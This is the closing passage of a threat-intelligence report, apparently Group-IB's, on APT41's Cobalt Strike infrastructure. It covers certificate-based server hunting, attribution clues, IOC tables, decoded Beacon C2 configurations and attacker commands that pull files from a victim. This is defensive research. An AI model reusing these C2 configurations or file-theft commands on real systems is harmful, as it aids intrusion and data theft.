download\r\nc:\\Windows\\WinSxS\\amd64_clientdeployment-connectsite_31bf3856ad364e35_10.0.14393.0_none_d2443e4100c72a7c\\web.config; download c:\\Users\\\r\n{redacted}\\Desktop\\Office Scan Backup\\Private\\AosBackup.txt\r\nHunting for APT41 Cobalt Strike servers\r\nThis section explains how to hunt for APT41’s network infrastructure. 
The group usually uses certain servers exclusively to\r\nhost the Cobalt Strike framework, while they exploit others only for active scanning through Acunetix. The Group-IB TI\r\nteam identified servers that were used for both, however. It is important that all APT41 servers were protected using the\r\ncloud service CloudFlare, which hides the real server addresses. That said, the Group-IB Threat Intelligence system detects\r\nserver backends belonging to various threat actors, including APT41.\r\nAs a result, our clients are among the first to proactively block new servers belonging to threat actors.\r\nTo identify APT41 infrastructure, it is essential to describe how Cobalt Strike operates.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 12 of 23\n\nThis framework serves as an intermediate server to which threat actors can connect from other devices. Other devices\r\nconnect to the Cobalt Strike server (usually, but not always) on port 50050. By default, the server generates a self-signed\r\nSSL certificate, which contains the “Cobalt Strike” strings.\r\nOne of the default Cobalt Strike certificates\r\nHowever, the servers used in these campaigns have different certificates on this port: the two certificates below, with the\r\nvalues “fortawesome”, are unique and clearly indicate that this Cobalt Strike image belongs to APT41.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 13 of 23\n\nSSL-cert SHA1-8c93083440cd9ce5fe4cf58c3348bd85bdf07f6c\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 14 of 23\n\nSSL-cert SHA1-8c93083440cd9ce5fe4cf58c3348bd85bdf07f6c\r\nThe next major feature of Cobalt Strike that the Group-IB team discovered is the use of custom SSL certificates on listeners.\r\nListeners are used to accept connections from the payload in order to maintain communication between bots and the C\u0026C\r\nserver. The group uses SSL certificates for HTTPS listeners. 
In the examples below, APT41 used unique SSL certificates\r\nthat mimicked “Microsoft”, “Facebook” and “CloudFlare”.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 15 of 23\n\nSSL-cert SHA1-0cc907db409a259611f56abc7dead19c6ed51fd0\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 16 of 23\n\nSSL-cert SHA1-afef10f23f1403761173557178c21308461778ba\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 17 of 23\n\nSSL-cert SHA1-4690a60aa5e6e323ad04993bf0076e9c78e7413c\r\nAccording to Group-IB Threat Intelligence data, servers with such certificates first emerged in early 2020. By the end of\r\n2021, their number reached 106. This means that the Group-IB team discovered more than 100 Cobalt Strike servers that are\r\nused only by APT41. Unsurprisingly, most are no longer active.\r\nArtifacts and other noteworthy findings\r\nChinese strings\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 18 of 23\n\nAn analysis conducted by Group-IB experts revealed the following key artifacts pointing to the origin of APT41:\r\nUsing mainly Chinese IP addresses to communicate with Cobalt Strike servers.\r\n171.208.242.0/24 CHINANET 171.208.241.0/24 CHINANET 110.191.217.0/24 CHINANET 102.223.72.0/22\r\nSUNNETWORK-SA 103.165.84.0/24 GEM1-HK 178.79.128.0/18 US-LINODE-20100510 45.152.112.0/23 ALANYHQ\r\n60.248.225.0/24 HINET-NET 61.221.57.0/24 HINET-NET\r\nUsing Chinese characters on the devices from which the attacks were conducted.\r\nUsing a specific Pinyin format for directory names.\r\nPinyin is a romanization system that represents the sounds of the Chinese language through the use of the Latin\r\nalphabet. In the case below, a directory is called “yuming”, which in Chinese means “domain name”.\r\nSeparate directories are used for certain organizations.\r\n“Working” hours” of APT41\r\nResearch into APT41 malware campaigns dated 2021 helped align all the group’s timestamps to UTC+8. As a result, we\r\nhave come to the following conclusions. 
The group starts working at 9 AM and its activity stops around 7 PM. It is clear that\r\nAPT41 members do not work long hours, unlike financially motivated hacker groups like Conti, for example. Groups like\r\nConti tirelessly “work” 14 hours a day without any days off, which we described in detail in our report titled “CONTI\r\nARMADA: THE ARMATTACK CAMPAIGN”.\r\nAccording to this map, the following countries are located in this time zone:\r\nRussia\r\nAustralia\r\nMalaysia\r\nSingapore\r\nChina\r\nand others\r\nConclusion\r\nFor a long time, security researchers believed that hacked legitimate pentesting and red teaming tools, which are widely used\r\nby hacker groups, make threat hunting and attribution more difficult. Among such tools, Cobalt Strike stands out. In the past,\r\nthe tool was appreciated by cybercriminal gangs targeting banks, while today it is popular among various threat actors\r\nregardless of their motivation, including infamous ransomware operators. That is why it is essential to proactively discover\r\nservers running this framework and to attribute those servers to specific threat actors. It is a crucial task for all cybersecurity\r\nteams that want to prevent attacks.\r\nIn this blog post, we shared examples of identifying and correlating Cobalt Strike with campaigns conducted by the state-sponsored group APT41. Thanks to our proprietary Group-IB Threat Intelligence system, which detects and attributes such\r\nattacks automatically, our clients are the first to be informed about cyberthreats, including all the relevant indicators of\r\ncompromise and TTPs. 
They are also the first to obtain the names of compromised organizations, which helps them avoid\r\nsupply-chain attacks and make their network infrastructure more secure.\r\nIn line with Group-IB’s mission of fighting cybercrime, we will continue to explore the methods, tools, and tactics used by\r\none of the oldest and still dangerous groups, APT41. We will also continue to inform and warn targeted organizations\r\nworldwide. We always strive to ensure that organizations under attack are notified as quickly as possible to help reduce\r\npotential damage. We also consider it our responsibility to share our findings with the cybersecurity community and\r\nencourage researchers to study advanced threats, share data, and use our technologies to combat cybercrime — together.\r\nIf you are interested in what we do and would like to become an expert in the same field, you can take our Digital Forensics,\r\nIncident Response, and Threat Intelligence training courses. We also welcome applications to join the Group-IB team.\r\nPlease check our vacancies on the website.\r\nIOCs\r\nIP\r\nFirst\r\nseen\r\nLast\r\nseen\r\nC\u0026C 
domains\r\n45.142.214[.]242\r\n2021-\r\n04-12\r\n2021-\r\n07-08\r\ndelaylink[.]tk,javaupdate.biguserup[.]workers.dev\r\n45.153.231[.]31\r\n2021-\r\n05-31\r\n2021-\r\n06-26\r\n45.144.31[.]31\r\n2021-\r\n06-04\r\n2021-\r\n06-26\r\ncolunm[.]tk\r\n45.142.214[.]56\r\n2021-\r\n06-09\r\n2021-\r\n07-20\r\nmute-pond-371d.zalocdn[.]workers.dev,cs16.dns04[.]com\r\n45.140.146[.]169\r\n2021-\r\n07-21\r\n2021-\r\n08-10\r\ngentle-voice-65e3.bsnl[.]workers.dev,newimages.socialpt2021[.]tk,updata.microsoft-api[.]workers.dev\r\n45.142.212[.]47\r\n2021-\r\n10–11\r\n2021-\r\n11-08\r\nsocialpt2021[.]club,mute-pond-371d.zalocdn[.]workers.dev\r\n185.250.150[.]22\r\n2021-\r\n08-16\r\n2021-\r\n08-31\r\nmute-pond-371d.zalocdn[.]workers.dev\r\n45.133.216[.]21\r\n2021-\r\n07-29\r\n2021-\r\n08-10\r\n45.153.231[.]32\r\n2020-\r\n11-03\r\n2021-\r\n07-08\r\n185.118.166[.]66\r\n2020-\r\n12-11\r\n2021-\r\n05-19\r\ncolunm[.]tk\r\nCobalt Strike Beacons\r\n45.142.214.242: \"config_payload\": { \"process-inject-stub\": \"fbM7aRSiLoJ01wyIz1ATTQ==\", \"http-get.uri\":\r\n\"javaupdate.biguserup.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1, \"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k netsvcs\", \"post-ex.spawnto_x86\":\r\n\"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\", \"watermark\": 305419896, \"process-inject-use-rwx\": 64, \"dns_idle\":\r\n134744072, \"sleeptime\": 60000, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCY/kAU3i5Cw6hXsXbgonByGxgt0JXT5y/KjC2e0rebpLU+6cncSPuWZUo24BqPBjVD0bR\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*2Referer: https://javaupdate.biguserup.workers.dev/Accept-Encoding:\r\n*\u0026Host: javaupdate.biguserup.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"531c720aae6e053b9db9be8e7b56f78f\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41, \"cookieBeacon\": 1, \"port\": 443,\r\n\"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: 
*\u0026Host: javaupdate.biguserup.workers.devAccept:\r\n*/*2Referer: https://javaupdate.biguserup.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2, \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0\" } },\r\n45.144.31.31: config_payload\": { \"process-inject-stub\": \"d5nX4wNnwCo18Wx3jr4tPg==\", \"http-get.uri\":\r\n\"cs.colunm.tk,/__utm.gif\", \"http-get.server.output\": \"\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\", \"watermark\": 305419896, \"process-inject-use-rwx\": 64,\r\n\"sleeptime\": 60000, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCBkyCWDMC1Q6VqRZIY35+iU7KtrHy9+HnzzPxCetQ5toPMCqlwQEB9hj38OnrVdGJY\r\n\"maxdns\": 255, \"http-post.client\": \"\u0026Content-Type: application/octet-streamid\", \"ssl\": true, \"publickey_md5\":\r\n\"9cdb3fca6156c6cbed2f01d6431b3dfb\", \"http-post.uri\": \"/submit.php\", \"cookieBeacon\": 1, \"port\": 8443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2, \"user-agent\": \"Mozilla/5.0 (compatible;\r\nMSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MANM; MANM)\" }\r\n45.142.212.47: \"config_payload\": { \"process-inject-stub\": \"9LoFKCrbYlLergvfu7Ki8A==\", \"http-get.uri\": \"mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1, \"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\":\r\n\"%windir%\\\\sysnative\\\\svchost.exe -k netsvcs\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\",\r\n\"process-inject-use-rwx\": 64, \"dns_idle\": 134744072, \"sleeptime\": 32547, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC3WFlrP6k0u+i8ozfzb2lLZHkTokxc3l8Hzysu+yF7wHEG7FSX9wC10GMQ3FDGYzgiH/0\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *\r\n(Host: 
mute-pond-371d.zalocdn.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"a9020b0e5342fb8877d2fb213802132f\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41, \"cookieBeacon\": 1, \"port\": 443,\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 22 of 23\n\n\"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept:\r\n*/*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2,\r\n\"user-agent\": \"Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko)\r\nVersion/4.0\" } },\r\n185.250.150.22: \"config_payload\": { \"http-get.uri\": \"mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js\",\r\n\"stage.cleanup\": 1, \"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k netsvcs\",\r\n\"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\", \"process-inject-use-rwx\": 64, \"dns_idle\":\r\n134744072, \"sleeptime\": 32547, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCQ2/teGq2eUgU2sZjiJCCcKH7RgQrsICSgVdA9hT26lhijhrN8zcv9V5oORMREIMAjGCy\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *\r\n(Host: mute-pond-371d.zalocdn.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"398c270c67cd915134ebbf7108090789\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41, \"cookieBeacon\": 1, \"port\": 443,\r\n\"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept:\r\n*/*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2,\r\n\"user-agent\": \"Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko)\r\nVersion/4.0\" }\r\nSource: 
https://blog.group-ib.com/apt41-world-tour-2021",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.group-ib.com/apt41-world-tour-2021"
	],
	"report_names": [
		"apt41-world-tour-2021"
	],
	"threat_actors": [],
	"ts_created_at": 1777605032,
	"ts_updated_at": 1777605050,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9f254057fef99f7fe265e4a8a770f2f7099827cd.pdf",
		"text": "https://archive.orkl.eu/9f254057fef99f7fe265e4a8a770f2f7099827cd.txt",
		"img": "https://archive.orkl.eu/9f254057fef99f7fe265e4a8a770f2f7099827cd.jpg"
	}
}